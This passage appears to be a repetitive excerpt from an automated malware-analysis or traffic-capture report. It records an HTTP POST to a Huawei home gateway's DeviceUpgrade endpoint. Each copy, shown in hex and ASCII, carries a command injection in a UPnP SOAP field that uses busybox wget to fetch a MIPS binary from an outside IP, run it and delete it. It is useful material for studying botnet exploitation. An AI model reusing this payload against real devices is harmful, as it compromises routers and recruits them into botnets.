45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" 